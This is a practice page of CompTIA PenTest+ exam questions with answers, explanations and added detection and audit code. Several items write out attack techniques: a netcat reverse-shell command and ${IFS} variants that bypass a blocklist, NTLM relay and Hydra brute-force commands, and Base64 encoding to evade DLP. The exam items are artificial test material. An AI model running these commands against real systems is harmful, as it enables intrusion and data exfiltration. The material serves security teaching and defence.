Practice Free PT0-003 Exam Online Questions
Which of the following is the most likely LOLBin to be used to perform an exfiltration on a Microsoft Windows environment?
- A . procdump.exe
- B . msbuild.exe
- C . bitsadmin.exe
- D . cscript.exe
C
Explanation:
In PenTest+ tradecraft, living-off-the-land binaries (LOLBins) are legitimate, built-in Windows utilities repurposed so that attacker activity blends in with normal administration. For exfiltration the key requirement is a native capability to move data out over a common network channel without dropping a third-party tool on the host. bitsadmin.exe, the command-line client for the Background Intelligent Transfer Service, fits because it creates and manages BITS jobs that download or upload files over HTTP/HTTPS; the transfers run asynchronously inside the BITS service, resume after reboots, and look like the routine background traffic Windows Update and other components generate. That makes it a common choice for staged, low-profile file movement during post-exploitation. bitsadmin.exe is deprecated in favour of the BITS PowerShell cmdlets but is still shipped on current Windows releases, and the same upload capability exists through Start-BitsTransfer -TransferType Upload.
By comparison, procdump.exe dumps process memory (commonly LSASS, for credential material) rather than moving files off-host; it is also a Sysinternals download rather than a built-in binary, so it is not a LOLBin in the strict sense. msbuild.exe is abused for code execution through inline tasks in project files, not for transfer. cscript.exe runs VBScript/JScript and can script almost anything, including HTTP requests, but it is not the built-in, job-based network transfer utility the question describes. bitsadmin.exe therefore best fits the exfiltration objective.
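A detection-side check for the LOLBin the answer names, added here as an example and not taken from the original page. It scans process-creation command lines for bitsadmin.exe transfer jobs and flags uploads, or downloads from hosts outside an allowlist. It assumes command lines are being logged at all (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing turned on); the log records, the allowlisted hostname update.example.internal and the destination hosts are constructed for the demo.

```python
import re
from typing import Optional
from urllib.parse import urlparse

# Switches that create, populate or start a BITS transfer job.
TRANSFER_SWITCHES = {"/transfer", "/create", "/addfile", "/resume", "/upload"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
BITSADMIN_RE = re.compile(r"(?:^|\\)bitsadmin(?:\.exe)?$")
# Assumed corporate allowlist; a real one comes from the update/proxy config.
ALLOWED_HOSTS = {"update.example.internal"}


def classify(cmdline: str) -> Optional[dict]:
    """Verdict for one logged command line, or None if it is not a
    bitsadmin transfer job (bitsadmin /list, other binaries, ...)."""
    tokens = cmdline.split()
    if not tokens or not BITSADMIN_RE.search(tokens[0].strip('"').lower()):
        return None
    switches = {t.lower() for t in tokens if t.startswith("/")}
    if not switches & TRANSFER_SWITCHES:
        return None
    hosts = {urlparse(u).hostname for u in URL_RE.findall(cmdline)} - {None}
    direction = "upload" if "/upload" in switches else "download"
    offsite = [h for h in hosts if h not in ALLOWED_HOSTS]
    return {
        "direction": direction,
        "hosts": sorted(hosts),
        # Any upload is exfiltration until proven otherwise; a download only
        # matters when it pulls from somewhere we do not recognise.
        "suspicious": direction == "upload" or bool(offsite),
    }


# Constructed records: the shape mimics a logged command line, but the
# paths, hosts and job names are invented.
RECORDS = [
    r'bitsadmin /transfer patchjob /download /priority normal '
    r'http://update.example.internal/patch.msi C:\Temp\patch.msi',
    r'"C:\Windows\System32\bitsadmin.exe" /transfer backup /upload /priority high '
    r'https://files.example.net/inbox/archive.zip C:\Users\Public\archive.zip',
    r'bitsadmin /addfile staging https://203.0.113.10/s/blob C:\ProgramData\blob',
    r'bitsadmin /list /allusers',
    r'notepad.exe C:\Users\Public\notes.txt',
]


def review(records) -> dict:
    """Only the suspicious verdicts, keyed by the command line that produced them."""
    return {r: v for r in records if (v := classify(r)) and v["suspicious"]}


if __name__ == "__main__":
    for cmd, verdict in review(RECORDS).items():
        print(f"{verdict['direction']:<8} {','.join(verdict['hosts']):<24} {cmd}")
```

The allowlist is the part that needs tuning in a real environment: BITS is used legitimately by Windows Update and many installers, so alerting on every download job is noise, while an upload job from a workstation is rare enough to investigate every time.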
A penetration tester obtains the following output during an Nmap scan:
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1801/tcp open msmq
2103/tcp open msrpc
3389/tcp open ms-wbt-server
Which of the following should be the next step for the tester?
- A . Search for vulnerabilities on msrpc.
- B . Enumerate shares and search for vulnerabilities on the SMB service.
- C . Execute a brute-force attack against the Remote Desktop Services.
- D . Execute a new Nmap command to search for another port.
B
Explanation:
The combination of SMB (445), the MSRPC endpoint mapper (135), MSMQ (1801) and RDP (3389) identifies a Windows host. Of these, SMB is the service that most often yields results quickly and at low cost: share listing, null-session or guest checks, OS and signing details, and version-specific vulnerability checks, all without credentials.
Enumerate shares and search for vulnerabilities on the SMB service (Option B):
SMB (Server Message Block) provides file and printer sharing; misconfigured or anonymously readable shares frequently expose credentials, deployment scripts and internal documentation.
Tools such as enum4linux, smbclient -L //<target> -N, or Nmap's smb-* NSE scripts list shares, test anonymous access and report OS and signing information.
Known SMB vulnerabilities (for example MS17-010, CVE-2017-0144, exploited by EternalBlue) can be checked safely with a version scan or the smb-vuln-ms17-010 script before any exploitation is attempted.
Reference: CompTIA PenTest+ PT0-003 Official Study Guide – "SMB Enumeration and Exploitation"
Incorrect options:
Option A (search for vulnerabilities on msrpc): port 135 is the RPC endpoint mapper. Enumerating it (for example with rpcdump) shows which RPC interfaces the host exposes, but it rarely yields an exploitable weakness by itself, and SMB enumeration usually surfaces the same host information faster.
Option C (brute-force RDP): password guessing generates a failed-logon event (4625) for every attempt, risks account lockout, and is the noisiest option on the list; it is not a sensible step before enumeration has been done.
Option D (scan for other ports): the open ports already provide enough attack surface to work with; widening the scan is not the immediate next step.
A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster.
Which of the following tools would be best to use for this purpose?
- A . NSE
- B . Nessus
- C . CME
- D . Trivy
D
Explanation:
In a container orchestration environment (for example, Kubernetes), the vulnerability scanner that adds the most value is one that understands container images, the OS packages and application dependencies inside them, and the misconfigurations typical of cloud-native deployments. Trivy is built for exactly that: it scans images and filesystems for known vulnerabilities in OS packages and language dependencies, reports misconfigurations in Kubernetes manifests and other infrastructure-as-code, and can scan a live cluster (trivy k8s) to cover the workloads that are actually running. This matches the PenTest+ guidance that the tool should fit the technology stack being assessed: a container ecosystem needs image- and dependency-aware scanning, not only traditional host and service scanning. Trivy reports known vulnerabilities rather than exploiting them, so its output is a prioritised list for the manual phase of the test.
NSE (the Nmap Scripting Engine) is excellent for network discovery and service enumeration, including exposed kubelet and API server ports, but it does not look inside container images. Nessus is a general-purpose vulnerability scanner that is useful for the cluster nodes themselves, but it is not focused on image supply-chain issues and cluster workload artifacts the way a dedicated container scanner is. CrackMapExec (CME) is a Windows/Active Directory enumeration and lateral-movement tool, unrelated to container scanning. Trivy is therefore the best fit for scanning a container orchestration cluster.
Which of the following techniques is the best way to avoid detection by data loss prevention tools?
- A . Encoding
- B . Compression
- C . Encryption
- D . Obfuscation
A
Explanation:
Encoding to Evade DLP:
Encoding (for example Base64) rewrites the bytes of a document into a different alphabet, so the sensitive strings are no longer literally present in the outbound data.
Many DLP rules are pattern-based (regular expressions for card numbers, identifiers or keywords, file-type signatures, fingerprinted documents); a rule that does not decode before matching sees only an opaque alphanumeric blob and lets it pass.
Why Not Other Options?
B (Compression): Compression changes size, not visibility; most DLP engines unpack common archive formats before inspection, so the content is still matched.
C (Encryption): An encrypted payload cannot be inspected at all, but DLP products and proxies recognise encrypted or high-entropy content (and password-protected archives) and commonly block it by policy, so it attracts attention rather than avoiding it.
D (Obfuscation): Obfuscation is aimed at hiding intent from a human analyst; for defeating automated pattern matching, encoding is the more direct technique.
Caveat: mature DLP products decode Base64 and other common transforms before matching, so on a real engagement this bypass should be verified against the deployed product rather than assumed.
Reference: CompTIA PenTest+ Domain 3.0 (Attacks and Exploits)
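The pattern-only rule the explanation describes, next to a hardened version, as an added example that is not from the original page: detect_naive() matches card and identifier patterns on outbound text and misses the same text once it is Base64-encoded; detect_decoding() decodes Base64-looking tokens a bounded number of layers deep before matching, which is what a capable DLP engine does. The rules, the messages and the card number (the standard Visa test number) are constructed.

```python
import base64
import re

# Pattern-only rules a simple DLP policy might use. The card rule is gated
# on a Luhn check to cut false positives on arbitrary 16-digit strings.
RULES = [
    ("card", re.compile(r"\b(?:\d[ -]?){15}\d\b")),
    ("ssn", re.compile(r"\b\d{3}-\d{2}-\d{4}\b")),
]
# A base64 run long enough to be worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def luhn_ok(digits: str) -> bool:
    total = 0
    for i, ch in enumerate(reversed(digits)):
        n = int(ch)
        if i % 2 == 1:
            n = n * 2 - 9 if n > 4 else n * 2
        total += n
    return total % 10 == 0


def detect_naive(text: str) -> list:
    """The weak rule: match patterns on the text exactly as it is sent."""
    hits = []
    for name, rx in RULES:
        for m in rx.finditer(text):
            if name == "card" and not luhn_ok(re.sub(r"\D", "", m.group())):
                continue
            hits.append((name, m.group()))
    return hits


def decoded_layers(text: str):
    """Yield the plaintext of every base64-looking token that decodes to UTF-8."""
    for tok in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
            yield raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # not base64, or binary
            continue


def detect_decoding(text: str, depth: int = 2) -> list:
    """The hardened rule: match, then decode candidate tokens and match again,
    a bounded number of layers deep, because nested encodings are cheap."""
    hits = detect_naive(text)
    if depth > 0:
        for inner in decoded_layers(text):
            hits.extend(detect_decoding(inner, depth - 1))
    return hits


# Constructed messages. 4111 1111 1111 1111 is the standard Visa test number.
PLAIN = "Customer 4111 1111 1111 1111 paid invoice 42"
ENCODED = base64.b64encode(PLAIN.encode()).decode()
DOUBLE = base64.b64encode(ENCODED.encode()).decode()

if __name__ == "__main__":
    for label, msg in (("plain", PLAIN), ("base64", ENCODED), ("base64 x2", DOUBLE)):
        print(f"{label:<10} naive={detect_naive(msg)} decoding={detect_decoding(msg)}")
```

The depth limit is the important design choice: without it, an attacker can make the detector spend unbounded time on a deliberately nested payload, and with depth 1 a double-encoded message slips through again, as the last case shows.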
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability.
The tester uses the following command:
nc -e /bin/sh 10.10.10.16 4444
Which of the following would most likely bypass the filtered space character?
- A . ${IFS}
- B . %0a
- C . +
- D . %20
A
Explanation:
To bypass a command injection blocklist that rejects the space character, the tester can use ${IFS}. IFS is the shell's Internal Field Separator; in POSIX shells it defaults to space, tab and newline, and the shell splits unquoted expansions into words on exactly those characters.
Command Injection:
Command injection vulnerabilities allow attackers to execute arbitrary commands on the host operating system through a vulnerable application.
Filters or blocklists are often implemented to hinder exploitation by disallowing certain characters, such as spaces, semicolons or pipes.
Bypassing Filters:
${IFS}: the payload contains no literal space, so it passes the filter; when the shell expands ${IFS} the result is whitespace, and word splitting separates the arguments exactly as if spaces had been typed. The braces matter: $IFS-e works because - cannot be part of a variable name, but $IFSfoo would be parsed as the variable IFSfoo and expand to nothing.
Example: nc -e /bin/sh 10.10.10.16 4444 can be rewritten as nc${IFS}-e${IFS}/bin/sh${IFS}10.10.10.16${IFS}4444. Note that -e is not supported by every netcat build (OpenBSD's nc omits it), so the tester should confirm which binary is on the target before relying on it.
Alternative Encodings:
%0a: URL encoding for a newline, which ends the current command so that another can follow; it does not separate arguments within one command.
+: Represents a space in application/x-www-form-urlencoded data (query strings and form bodies).
%20: URL encoding for a space.
All three are decoded by the web server or framework before the value reaches the shell, so a filter applied to the decoded value still sees a literal space. ${IFS} is the only option the shell itself resolves, which makes it the right choice for a shell command context. It does assume that $, { and } are not also blocked; if they are, other shell tricks serve the same purpose, such as a tab character or, in bash, brace expansion like {nc,-e,/bin/sh,10.10.10.16,4444}.
Reference: Command injection (how it works and common exploitation techniques); filter bypass using environment-variable expansion; shell scripting and environment variables (CompTIA PenTest+).
By using ${IFS}, the tester bypasses the filtered space character and executes the intended command, demonstrating that the vulnerability is exploitable.
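The bypass worked through against a real shell, as an added example that is not from the original page. blocklist_allows() models a hypothetical filter that rejects spaces and shell metacharacters, to_ifs() rewrites a command with ${IFS}, and run_in_sh() hands the result to sh -c the way the injection point would. The command used is a harmless printf rather than the nc reverse shell from the question, and the block assumes a POSIX sh on PATH; the unbraced case shows why the braces are needed.

```python
import subprocess

# A hypothetical blocklist of the kind the question describes.
BLOCKED_CHARS = frozenset(" ;&|`")


def blocklist_allows(payload: str) -> bool:
    """True if the naive filter would let the payload through."""
    return not any(ch in BLOCKED_CHARS for ch in payload)


def to_ifs(command: str) -> str:
    """Rewrite a command so that it contains no literal space.

    ${IFS} expands to the shell's field separators (space, tab, newline by
    default); because the expansion is unquoted, the shell splits on those
    same characters, so each ${IFS} becomes an argument boundary. The braces
    are required whenever the next character could continue a variable name:
    $IFS-e is fine, but $IFSfoo is read as the (unset) variable IFSfoo.
    """
    return "${IFS}".join(command.split(" "))


def run_in_sh(payload: str) -> str:
    """Hand the payload to a real POSIX sh, as the vulnerable application would."""
    done = subprocess.run(["sh", "-c", payload], capture_output=True, text=True, check=True)
    return done.stdout


# A harmless stand-in for the nc reverse shell in the question.
ORIGINAL = "printf %s:%s alpha beta"
PAYLOAD = to_ifs(ORIGINAL)            # printf${IFS}%s:%s${IFS}alpha${IFS}beta


def demo() -> dict:
    return {
        "original_passes_filter": blocklist_allows(ORIGINAL),   # False
        "payload_passes_filter": blocklist_allows(PAYLOAD),     # True
        "shell_output": run_in_sh(PAYLOAD),                     # "alpha:beta"
        # Without braces, $IFSalpha is one variable name and the word vanishes,
        # so printf receives only "beta" and prints "beta:".
        "unbraced_output": run_in_sh("printf$IFS%s:%s$IFSalpha${IFS}beta"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```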
A penetration tester identifies the URL for an internal administration application while following DevOps team members on their commutes.
Which of the following attacks did the penetration tester most likely use?
- A . Shoulder surfing
- B . Dumpster diving
- C . Spear phishing
- D . Tailgating
A
Explanation:
The technique used in this scenario is shoulder surfing: directly observing a person while they work in order to collect sensitive information such as credentials, internal URLs or other confidential data.
Here the pentester followed the DevOps team members on their commute and read an internal URL from their screens. No direct social engineering was used (as in spear phishing), no unauthorized physical entry (as in tailgating), and no search through discarded material (dumpster diving).
Reference: PT0-003 Objective 2.1 – Explain the importance of physical security assessments.
Shoulder surfing is listed as a key social engineering technique.
A tester obtains access to an endpoint subnet and wants to move laterally in the network.
Given the following Nmap scan output:
Nmap scan report for some_host
Host is up (0.01s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
smb2-security-mode: Message signing disabled
Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?
- A . responder -I eth0 -dwv ntlmrelayx.py -smb2support -tf <target>
- B . msf > use exploit/windows/smb/ms17_010_psexec
- C . hydra -L administrator -P /path/to/passwdlist smb://<target>
- D . nmap --script smb-brute.nse -p 445 <target>
A
Explanation:
The Nmap script output shows SMB (port 445) open with message signing disabled, so the host will accept an SMB session whose NTLM authentication was relayed through an attacker in the middle.
Option A (responder -I eth0 -dwv together with ntlmrelayx.py -smb2support -tf <target>) ✅: Correct. These are two tools run side by side. Responder answers LLMNR and NBT-NS requests (and WPAD requests with -w) so that hosts on the subnet authenticate to the attacker's machine; ntlmrelayx takes that live NTLM exchange and forwards it to the signing-disabled target (-tf supplies a file of targets, -smb2support enables SMB2), and if the relayed account is a local administrator there it can dump the SAM or execute commands. Two practical points: turn off Responder's own SMB and HTTP servers in Responder.conf so the connections reach ntlmrelayx instead of being terminated by Responder, and note that what is relayed is the live authentication, not a previously captured hash. The traffic involved is ordinary name resolution and a single SMB logon, far less conspicuous than repeated failed logons.
Option B (ms17_010_psexec) ❌: this exploits MS17-010 (EternalBlue); nothing in the output shows the host is unpatched, and a failed attempt can crash the target, which is neither quiet nor safe.
Option C (hydra brute-force) ❌: SMB password guessing generates a failed-logon event (4625) for every attempt, risks account lockout, and will likely trigger alerts.
Option D (smb-brute.nse) ❌: the same brute-force attack driven from Nmap, equally loud and detectable.
Reference: CompTIA PenTest+ PT0-003 Official Guide – NTLM Relay & SMB Exploitation
A penetration tester performs the following scan:
nmap -sU -p 53,161,162 192.168.1.51
PORT | STATE
53/udp | open|filtered
161/udp | open|filtered
162/udp | open|filtered
The tester then manually uses snmpwalk against port 161 and receives valid SNMP responses.
Which of the following best explains the scan result for port 161?
- A . The SNMP daemon delayed its response beyond Nmap’s UDP scan timeout.
- B . Nmap marked the port as open|filtered because no response was received.
- C . The scanned host applied rate limiting to its responses to prevent UDP fingerprinting.
- D . The Nmap scan lacked root privileges, which reduced packet inspection accuracy.
B
Explanation:
In PenTest+ network enumeration, UDP scanning is emphasized as inherently less reliable than TCP because many UDP services do not respond unless they receive an application-valid request, and many firewalls silently drop unsolicited UDP probes. With Nmap -sU, if the scanner does not receive either (1) an application-layer UDP response indicating the service is listening or (2) an ICMP “port unreachable” message indicating the port is closed, Nmap cannot definitively classify the port. In that case, it reports open|filtered, meaning the port may be open but nonresponsive to the probe, or traffic may be filtered.
SNMP returns data only to a well-formed request carrying a community string the agent accepts. Nmap sends a small protocol-specific payload to some well-known UDP ports (for 161, an SNMP request using the default community string public); if the agent is configured with a different community string or simply drops the packet, nothing comes back, and because no ICMP port unreachable arrives either, the port stays open|filtered. snmpwalk run with the correct community string sends a valid query and gets a valid answer. Option A describes a slow reply, but the scan received no reply at all, and a service that answers snmpwalk promptly is not slow. Option D is wrong because -sU needs raw sockets and Nmap refuses to run it without privileges rather than producing degraded results. Option C is possible in principle, since Linux hosts rate-limit ICMP unreachables and Nmap slows UDP scans to match, but rate limiting only affects how quickly closed ports are confirmed; it is not the reason a listening service gave no application response.
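One parser for the three scan outputs above (the TCP service table, the smb2-security-mode script result, and the UDP open|filtered table), as an added example that is not from the original page. It reads Nmap's normal output, records port states, and applies the same priorities the three answers use: SMB enumeration first, a relay check when signing is not required (Nmap reports either "Message signing disabled" or "enabled but not required", and both allow relay), an application-level re-probe for UDP ports that gave no reply, and no brute force. The scan text, hostnames and target-file name are constructed.

```python
import re
from dataclasses import dataclass, field

# One port line in either layout seen above:
# "445/tcp open microsoft-ds" or the pipe-separated "161/udp | open|filtered".
PORT_RE = re.compile(
    r"^(\d+)/(tcp|udp)\s*\|?\s*(open\|filtered|open|closed|filtered)\b(?:\s+(\S+))?"
)


@dataclass
class ScanSummary:
    ports: dict = field(default_factory=dict)   # (port, proto) -> (state, service)
    smb_signing_disabled: bool = False          # also True for "enabled but not required"


def parse_nmap(text: str) -> ScanSummary:
    summary = ScanSummary()
    in_smb2_script = False
    for raw in text.splitlines():
        line = raw.strip().lstrip("|_ ").strip()    # drop NSE output prefixes
        m = PORT_RE.match(line)
        if m:
            port, proto, state, service = m.groups()
            summary.ports[(int(port), proto)] = (state, service or "")
            in_smb2_script = False
            continue
        if line.startswith("smb2-security-mode"):
            in_smb2_script = True
        low = line.lower()
        if in_smb2_script and ("signing disabled" in low or "not required" in low):
            summary.smb_signing_disabled = True
    return summary


def next_steps(summary: ScanSummary) -> list:
    """SMB enumeration first, relay when signing is off, application probes
    for unanswered UDP ports, and no brute force."""
    steps = []
    tcp_open = {p for (p, proto), (state, _) in summary.ports.items()
                if proto == "tcp" and state == "open"}
    if 445 in tcp_open:
        steps.append("445/tcp: enumerate shares (smbclient -L //target -N, enum4linux) "
                     "before looking at MSRPC or RDP")
        if summary.smb_signing_disabled:
            steps.append("445/tcp: signing not required, NTLM relay candidate "
                         "(ntlmrelayx.py -smb2support -tf targets.txt)")
    if 2049 in tcp_open:
        steps.append("2049/tcp: NFS exposed, list exports with showmount -e")
    if 3389 in tcp_open:
        steps.append("3389/tcp: RDP noted; do not brute force (lockouts, 4625 events)")
    for (port, proto), (state, _) in sorted(summary.ports.items()):
        if proto == "udp" and state == "open|filtered":
            client = {161: "snmpwalk", 53: "dig"}.get(port, "a protocol-specific client")
            steps.append(f"{port}/udp: no reply to Nmap's probe, re-test with {client}")
    return steps


# Constructed scan output in the two layouts seen above.
SMB_SCAN = """\
PORT     STATE SERVICE
135/tcp  open  msrpc
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server
Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing disabled
"""
UDP_SCAN = """\
PORT    | STATE
53/udp  | open|filtered
161/udp | open|filtered
"""

if __name__ == "__main__":
    for scan in (SMB_SCAN, UDP_SCAN):
        for step in next_steps(parse_nmap(scan)):
            print(step)
```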
A penetration tester performs a service enumeration process and receives the following result after scanning a server using the Nmap tool:
PORT STATE SERVICE
22/tcp open ssh
25/tcp filtered smtp
111/tcp open rpcbind
2049/tcp open nfs
Based on the output, which of the following services provides the best target for launching an attack?
- A . Database
- B . Remote access
- C . Email
- D . File sharing
D
Explanation:
From the Nmap results:
Service Analysis:
SSH (22): Secure Shell is a remote access protocol that is typically well-secured with encryption and authentication mechanisms. It’s not the easiest to exploit without valid credentials or known vulnerabilities.
SMTP (25): The port is filtered, which indicates that it might be blocked by a firewall, making it less accessible as an attack vector.
RPCBind (111): RPC services can sometimes expose vulnerabilities, but they are less common in modern systems.
NFS (2049): Network File System is a file-sharing service. Misconfigured NFS servers often expose sensitive files or directories that can be accessed without proper authentication.
Best Target:NFS (port 2049) is the most attractive target. Attackers can exploit insecure exports, gain unauthorized access to shared directories, or elevate privileges if the server allows root access over NFS.
CompTIA Pentest+
Reference: Domain 2.0 (Information Gathering and Vulnerability Identification)
Domain 3.0 (Attacks and Exploits)
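An audit of the NFS configuration the answer targets, as an added example that is not from the original page. It parses /etc/exports-style lines (the server-side view of what showmount -e shows a client) and reports the settings that make NFS attractive: world exports, writable exports that rely on AUTH_SYS, no_root_squash and insecure. The weak export file is shown beside a corrected one; both are constructed.

```python
import re

# sec= flavours that give the server a cryptographic client identity instead
# of a client-asserted uid/gid.
KERBEROS = {"sec=krb5", "sec=krb5i", "sec=krb5p"}


def parse_exports(text: str) -> list:
    """Parse /etc/exports lines into (path, client, options) tuples.
    A client spec with no host part, e.g. "(rw)", exports to everyone."""
    exports = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        path, *specs = line.split()
        for spec in specs:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            host = m.group(1) or "*"
            opts = {o for o in (m.group(2) or "").split(",") if o}
            exports.append((path, host, opts))
    return exports


def findings(host: str, opts: set) -> list:
    """Risk notes for one export; exports(5) defaults are ro, root_squash, secure."""
    out = []
    world = host == "*" or host.startswith("*.")
    kerberos = bool(opts & KERBEROS)
    if world:
        out.append("exported to any client")
    if not kerberos:
        out.append("AUTH_SYS only: the client's claimed uid/gid is trusted")
    if "rw" in opts and not kerberos:
        out.append("writable by any client in scope, as any uid")
    if "no_root_squash" in opts:
        out.append("remote uid 0 is not squashed (no_root_squash)")
    if "insecure" in opts:
        out.append("accepts requests from unprivileged source ports (insecure)")
    return out


def audit(text: str) -> dict:
    """Map each 'path host' export to its list of findings."""
    return {f"{path} {host}": findings(host, opts) for path, host, opts in parse_exports(text)}


# Constructed export files: the weak configuration beside the corrected one.
WEAK = """\
/srv/share   *(rw,sync,no_root_squash)
/home        10.0.0.0/8(rw,sync)
"""
HARDENED = """\
/srv/share   10.0.5.0/24(ro,sync,root_squash,sec=krb5p)
/home        10.0.5.0/24(rw,sync,root_squash,sec=krb5p)
"""

if __name__ == "__main__":
    for label, text in (("weak", WEAK), ("hardened", HARDENED)):
        print(label)
        for export, notes in audit(text).items():
            print(f"  {export}: {notes or ['ok']}")
```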
A penetration tester wants to expand access into a network by enumerating users and credentials.
The tester runs some tools for enumeration and captures the following information:
[SMB] Client: 10.203.10.14
[SMB] Username: comptiaadmin
[SMB] Hash: 10.203.20.16:a96409231c099f17
Which of the following steps should the penetration tester take next?
- A . Use Hydra to brute-force passwords with the captured username.
- B . Utilize the auxiliary/server/http_ntlmrelay module in Metasploit.
- C . Perform a secretsdump with Impacket using the NTLM digest.
- D . Load the hash information into John the Ripper for cracking.
D
Explanation:
The best next step is to load the captured hash into John the Ripper (or hashcat) for offline cracking. What Responder-style tools record from SMB is a NetNTLM challenge/response pair, not the account's NT hash: the server challenge, the client's response and (for NTLMv2) the blob. That material can be verified offline against candidate passwords, which is efficient and quiet, since it never touches the target's authentication service and cannot cause lockouts, unlike brute force with Hydra. It cannot be used for pass-the-hash, which is why secretsdump (Option C) is not applicable: Impacket needs either the NT hash or a plaintext password, and a captured response cannot be turned into either. NTLM relay (Option B) works only while a victim is actively authenticating and only against hosts that accept relayed sessions; the capture shown is already complete. Cracking the captured hash is therefore the most appropriate immediate action. Once the password is recovered, the tester can authenticate normally, and secretsdump or lateral movement become available.
